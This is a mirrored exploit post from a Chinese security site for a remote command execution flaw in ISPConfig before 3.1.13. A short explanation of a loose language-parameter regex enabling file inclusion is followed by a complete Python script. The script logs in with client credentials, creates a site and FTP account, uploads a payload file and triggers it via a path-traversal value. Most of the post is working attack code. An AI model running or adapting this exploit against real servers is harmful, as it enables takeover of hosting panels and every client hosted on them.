首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ISPConfig < 3.1.13 - Remote Command Execution
来源:vfocus.net 作者:0x09AL 发布时间:2018-10-08  
# Title: ISPConfig < 3.1.13 - Remote Command Execution
# Author: 0x09AL
# Date: 20/08/2018
# Vendor: https://www.ispconfig.org/
#
# Vulnerability Description
#
# There is an include on almost all the php files, which includes the language template.
# For example:
 
# In password_reset.php - Line 46 the following code tries to include the filename
# that is specified in the $_SESSION['s']['language'] variable.
#
# include ISPC_ROOT_PATH.'/web/login/lib/lang/'.$_SESSION['s']['language'].'.lng';
#
# Searching a little bit where the $_SESSION['s']['language'] variable is set we can find a reference in user_settings.php
# if(preg_match('/[a-z]{2}/',$_POST['language'])) {
#            $_SESSION['s']['user']['language'] = $_POST['language'];
#            $_SESSION['s']['language'] = $_POST['language'];
#        } else {
#            $app->error('Invalid language.');
#        }
#
# The regex checks if the language contains two lower-case characters.
# The problem is that everything that contains two [a-z] characters will match the regex.
# Developer probably missed the ^ $ on the regex to match the entire file.
#
# Since in the new versions of php we can not use null byte injections, either a path-truncation attack
# we can create a ftp-account, upload the file we want to include with .lng extension at our path and the code
# will get executed as the ispconfig account and not as our chroot-ed account.
#
# This exploit can be triggered by having clients credentias , and exploiting this vulnerability we can compromise
# the entire clients.
#
# You need to specify the hostname:port , username, and password of the client.
 
import requests
import ftplib
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
 
host = "host:8080"
username = "username"
password = "password"
 
exp = requests.session()
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
ftp_username = "randomusr1"
domain = "pwned.com"
site_id = 1
payload_name = "pwned1"
path = ""
 
 
 
def login():
  r = exp.post('https://%s/login/index.php' % host,data={'username':username,'password':password,'s_mod':'login','s_pg':'index'},verify=False)
  if(r.text.find("wrong")>0):
    print "[-] Incorrect credentials [-]"
  else:
    print "[+] Logged in Succesfully [+]"
 
 
def createSite():
  
  r = exp.get('https://%s/sites/web_vhost_domain_edit.php' % host,verify=False)
  _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
  _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
  phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
  r = exp.post('https://%s/sites/web_vhost_domain_edit.php' % host,data={'server_id':1,'ip_address':'*','ipv6_address':'','domain':'%s' % domain,'hd_quota':1024,'traffic_quota':1024,'subdomain':'www','php':'no','fastcgi_php_version':'','active':'y','id':'','_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
  pass
 
def createFtp():
  global site_id
  r = exp.get('https://%s/sites/ftp_user_edit.php' % host,verify=False)
  print "[+] Getting IDSof the sites [+]"
  temp_array = r.text.split('<option value=')
  nr_sites = len(temp_array)
  print "[+] Number of sites %d [+]" % (int(nr_sites) - 1)
  # Find the latest created site by checking the ID.
  max_id = -9999
 
  for i in range(1,nr_sites):
    temp = int(temp_array[i].split('>')[0].replace("'",""))
    if(temp > max_id):
      max_id = temp
  site_id = max_id
  print "[+] Newly created site id is : %d [+]" % site_id
  _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
  _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
  phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
  r = exp.post('https://%s/sites/ftp_user_edit.php' % host,data={'parent_domain_id':site_id,'username':'%s' % ftp_username,'password':'%s' % password,'repeat_password':'%s' % password,'quota_size':1024,'active':'y','id':'','_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
  print "[+] Created FTP Account [+]"
  pass
 
 
def uploadPayload():
  ftp = ftplib.FTP(host.split(":")[0])
  ftp.login(username+ftp_username, password)
  ftp.cwd("web")
  ftp.storlines("STOR %s.lng" % payload_name,open("test.txt"))
  print "[+] Payload %s uploaded Succesfully [+]" % payload_name
  pass
 
def waitTillCreation():
  while 1:
    print "[+] Trying [+]"
    r = exp.get('https://%s/datalogstatus.php' % host,verify=False)
    temp = json.loads(r.text)
    if(temp["count"] == 0):
      print "[+] Everything created .... [+]"
      return
    time.sleep(5)
 
def getRelativePath():
  
  global path
 
  r = exp.get('https://%s/sites/web_vhost_domain_edit.php?id=%d&type=domain' % (host,site_id),verify=False)
  path = r.text.split('Document Root</label>')[1].split('<div class="col-sm-9">')[1].split('<')[0]
  path += "/web/" + payload_name
  print "[+] Uploading payload in %s [+]" % path
 
def triggerVuln():
  r = exp.get('https://%s/tools/user_settings.php' % host,verify=False)
  _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
  _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
  phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
  user_id = r.text.split('name="id" value="')[1].split('"')[0]
  r = exp.post('https://%s/tools/user_settings.php' % host,data={'passwort':'','repeat_password':'','language':'../../../../../../../../../../../../../..%s' % path,'id':'%s' % user_id,'_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
  r = exp.get('https://%s/index.php'% host,verify=False)
  print r.text
 
login()
createSite()
createFtp()
getRelativePath()
waitTillCreation()
uploadPayload()
triggerVuln()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NICO-FTP 3.0.1.19 - Buffer Ove
·Easy File Sharing Web Server 7
·FTP Voyager 16.2.0 - Denial of
·Windows Net-NTLMv2 Reflection
·H2 Database 1.4.196 - Remote C
·Navigate CMS Unauthenticated R
·Zahir Enterprise Plus 6 build
·Zahir Enterprise Plus 6 Stack
·Snes9K 0.0.9z - Denial of Serv
·Unitrends UEB HTTP API Remote
·Linux Kernel 2.6.x / 3.10.x /
·AppArmor Filesystem Blacklisti
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved